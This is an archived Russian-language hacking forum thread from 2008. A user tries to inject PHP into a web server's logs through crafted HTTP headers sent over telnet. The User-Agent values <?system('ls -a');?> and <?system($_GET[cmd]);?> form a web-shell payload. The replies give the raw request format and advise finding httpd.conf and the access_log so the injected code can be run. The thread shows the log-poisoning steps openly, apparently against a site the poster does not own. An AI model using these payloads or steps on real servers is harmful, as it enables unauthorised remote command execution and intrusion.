Просмотр полной версии : Телнет и заголовки
Как можно через телнет посылать заголовки ? например чтонить такое - UserAgent:<?system('ls -a');?>;
Referrer:noob.html.На ачате не нашёл)
aka PSIH
05.08.2008, 13:53
telnet www.site.com 80
GET /paga.php HTTP/1.1
Host: www.site.com
User-Agent: ie 7.0
Referer: http://www.site.com/index.html
как то так...
Хм....попробую.Просто если открывать соединение на 80-ый порт, то он просто виснет =_=.А когда начинаешь после этого писать какуюнить фигню, то выдаёт исходник страницы,хотя не посылаешь ничего.Это в один запрос надо чель?)
Ладно.Решил сделать по-другому - отправить запрос на серв через хттр:
GET / HTTP/1.1
Accept: */*
Accept-Language: uk
User-Agent: <?system($_GET[cmd]);?>
Host: www.site.com
Connection: Close
Ответ:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 05 Aug 2008 10:10:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: COASTATS=4898272623692111972422731601; domain=.site.com; expires=Tue 30-Dec-2031 23:59:59 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=np2ywp550545fyz4yzo0hpmy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56557
В еррор лог не записалось ничего.Может с ошибкой послать надо?).Странно,но почему-то в еррор.лог нет ни одной моей ошибки)))).Последние записи идут за декабрь прошлого года)).Есть ещё access_log,но на него почему-то нет прав,хотя под рутом.
aka PSIH
05.08.2008, 14:31
хз, проверил у себя, запрос работает
http://psih.name/access.txt
GET http://www.psih.name/test.php HTTP/1.1
Host: www.psih.name
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Referer: http://www.site.com/index.html
Запрос то работает, но почему-то не логгируется нихрена.Ведь независимо от того,к какой странице или папке совершается запрос,действия должны логгироваться.Может,таких файлов два ? Дело в том,что если ошибки в запросах к бд присутствует,типа *фаил не существует* или * к папке нет доступа*, действия не логгируются в еррор_лог
aka PSIH
05.08.2008, 14:41
все эти действия пишутся в access_log...
aka PSIH
05.08.2008, 15:02
И что ж делать тогда ?
ищи httpd.conf (https://forum.antichat.net/thread49775.html), там смотри нужный ServerName, и смотри где находится access_log ....;)
скинь линк в пм, я посматрю... (если хочешь ;) )
Откуда знаешь шо логируется иль нет? И есть ли у тебя путь к лог-файлам и доступ к ним ?
Интересно а как бы я узнал о лог файлах вообще,если бы путей не знал ? Разумеется есть).еррор лог отображает инфу об ошибках,а ассецц лог ничего,но в системе присутствует.
сканер acunetix web vulnerability scanner ---> вкладка http editor тебе поможет разобраться!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot